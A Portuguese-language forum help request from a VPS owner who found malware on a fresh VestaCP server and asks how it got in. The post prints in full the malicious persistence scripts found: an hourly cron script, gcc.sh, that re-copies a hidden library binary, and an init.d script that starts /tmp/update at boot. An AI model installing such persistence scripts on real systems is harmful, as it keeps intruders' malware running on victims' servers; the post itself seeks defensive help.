Ir para conteúdo

Featured Replies

Postado

Boa tarde

Tenho um vps com vestacp que configurei a 30 dias, está vazio sem nenhum site ou programa. Ontem as 15:15 recebi email do servidor informando sobre erro na execução de um processo cron.hourly.  Então quando fui verificar era um arquivo malicioso chamado gcc.sh.

Então fui verificar o servidor e vi que foi criada uma entrada no crontab para executar este aquivo a cada 1 hora, no diretório /etc/cron.hourly foi criado esse arquivo gcc.sh e no diretório /et/init.d foi criado um arquivo chamado update. O conteudo dos aquivos é o seguinte:

1- gcc.sh

#!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done cp /lib/libudev.so /lib/libudev.so.6 /lib/libudev.so.6

 

Obs. eu recebi o aviso de erro do cron porque o arquivo libudev.so não existe no meu servidor, se existisse o script teria conseguido rodar.

 

2- update

#!/bin/sh
# chkconfig: 12345 90 90
# description: update
### BEGIN INIT INFO
# Provides:        update
# Required-Start:    
# Required-Stop:    
# Default-Start:    1 2 3 4 5
# Default-Stop:        
# Short-Description:    update
### END INIT INFO
case $1 in
start)
    /tmp/update
    ;;
stop)
    ;;
*)
    /tmp/update
    ;;
esac

 

Os amigos já tiveram problema com isso, sabem como pode ter sido feita essa infecção?

Detalhes: 

1- Esses arquivos gcc.sh e update não são localizados quando faz um busca com locate ou find.

2- Eu já vi em outra ocasião, esse mesmo arquivo gcc.sh dentro do public_html de algumas contas, em servidor cPanel, de um antigo cliente meu. Na época ele estava com problemas de spam e por coincidência encontrou esse arquivo.

3- Meu servidor está com a porta ssh alterada, senha complicada, firewall e fail2ban ativos, nos logs não consta comandos que não tenham sido executados por mim, nos logs de acesso não consta acessos ssh de IPs que não seja o meu.

 


Participe da conversa

Você pode postar agora e se cadastrar mais tarde. Se você tem uma conta, faça o login para postar com sua conta.
Nota: Sua postagem exigirá aprovação do moderador antes de ficar visível.

Visitante
Infelizmente, seu conteúdo contém termos que não são permitimos. Edite seu conteúdo para remover as palavras destacadas abaixo.
Responder

Quem Está Navegando 0

  • Nenhum usuário registrado visualizando esta página.

Informação Importante

Concorda com os nossos termos?